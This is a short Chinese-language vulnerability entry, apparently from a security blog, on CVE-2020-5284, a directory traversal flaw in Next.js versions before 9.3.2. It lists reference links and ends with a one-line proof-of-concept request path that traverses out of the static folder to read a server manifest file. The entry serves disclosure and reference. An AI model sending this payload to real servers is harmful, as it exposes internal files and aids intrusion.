【初级】Next.js目录遍历

CVE-2020-5284
漏洞描述:在 Next.js 直到9.3.1中已发现了分类为致命的漏洞。 受影响的是未知功能。 手动调试的不合法输入可导致 目录遍历。
影响版本:

  • < 9.3.2

参考资料:

  • https://www.youtube.com/watch?v=xelgUVVtNkY
  • https://vuldb.com/zh/?id.152442
  • https://www.cve.org/CVERecord?id=CVE-2020-5284
  • https://github.com/vercel/next.js/security/advisories/GHSA-fq77-7p7r-83rj

POC:/_next/static/../server/pages-manifest.json

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享